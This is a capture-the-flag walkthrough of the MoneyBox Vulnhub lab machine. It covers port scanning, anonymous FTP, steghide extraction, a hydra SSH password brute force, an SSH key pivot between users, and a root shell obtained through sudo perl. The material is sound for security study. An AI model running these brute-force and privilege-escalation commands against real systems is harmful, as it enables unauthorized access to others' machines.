MoneyBox : 1 Vulnhub Walkthrough
Initial Enumeration and User Shell
As usual, I started with a nmap scan looking for open ports and running services.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ nmap -sC -sV -oA nmap/initial 192.168.1.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 23:04 IST
Nmap scan report for 192.168.1.2
Host is up (0.00085s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 08:48 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
| 256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_ 256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds
We have a FTP server running on port 21, SSH on port 22 and Apache web server on port 80. Port 21 has anonymous login allowed, so I started enumerating it first. Enter the username anonymous
, leave the password field empty and press enter.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ftp 192.168.1.2
Connected to 192.168.1.2.
220 (vsFTPd 3.0.3)
Name (192.168.1.2:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 08:48 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
226 Transfer complete.
1093656 bytes received in 0.10 secs (10.5665 MB/s)
ftp> exit
221 Goodbye.
We have a image named trytofind.jpg
which looks like this:
We can see some white marks on the image, which suggests that this image has some data encrypted within it. We can use steghide
to extract the hidden data.
I tried extracting the data using steghide
using no password but that did not work. This means that we need to find the password to extract data from the image.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ steghide --extract -sf trytofind.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Next, I started enumerating the port 80 to see if we can find any password there:
We do not have anything interesting on the home page, Also I checked the source code of the page but did not find anything useful. Next I performed a gobuster scan to look for hidden files or directories and found a directory name /blogs
.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ gobuster dir -u http://192.168.1.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.zip,.jpg,.js,.css
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.2
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: zip,jpg,js,css,php,html,txt
[+] Timeout: 10s
===============================================================
2021/03/05 23:12:07 Starting gobuster
===============================================================
/index.html (Status: 200)
/blogs (Status: 301)
/server-status (Status: 403)
===============================================================
2021/03/05 23:27:18 Finished
===============================================================
After visiting the /blogs
directory I again checked and scrolled down through the source code and this time there was a secret message.
I visited the /S3cr3t-T3xt
directory and in its source code, I found another comment which contained the password we wanted.
I used this to extract data from the trytofind.png
using steghide
and this time I found a data.txt
.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ steghide --extract -sf trytofind.jpg1
Enter passphrase:
wrote extracted data to "data.txt".
After reading the contents of data.txt
, I found a username renu
and the hint that renu
is using a weak password, so we brute force the SSH login.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ cat data.txt
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
Next, I used hydra
to brute force the login password and found the password 987654321
.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.2 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-05 23:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.2:22/
[22][ssh] host: 192.168.1.2 login: renu password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-05 23:30:26
We can now login via SSH using username renu
and password 987654321
.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ssh renu@192.168.1.2
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
renu@192.168.1.2's password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ ls
ftp user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag
==> us3r1{F14g:0ku74tbd3777y4}
renu@MoneyBox:~$
Privilege Escalation
Next, I checked for other users on the box and found a user lily
. I checked the .ssh
directory of user lily
and found that user renu
was added in the authorized_keys
file.
renu@MoneyBox:/home/lily/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIi
VrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlv
IVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian
This means that user renu
can directly login as user lily
via SSH without using any password. So I switched to user lily
using the following command and got our second flag:
renu@MoneyBox:/home/lily/.ssh$ ssh lily@192.168.1.2
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag
==> us3r{F14g:tr5827r5wu6nklao}
lily@MoneyBox:~$
Root Shell
Gaining a root shell was quite easy. I ran the sudo -l
command and found that user lily
can run /usr/bin/perl
as root.
lily@MoneyBox:/home$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
I checked on GTFOBins and found that we can spawn a root shell by using the following command:
lily@MoneyBox:/home$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@MoneyBox:/home#
Hurray! we are root and now we can read our final flag present in the home directory.
root@MoneyBox:~# cat .root.txt
Congratulations.......!
You Successfully completed MoneyBox
Finally The Root Flag
==> r00t{H4ckth3p14n3t}
I'm Kirthik-KarvendhanT
It's My First CTF Box
instagram : ____kirthik____
See You Back....
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alexey Kuvaldin.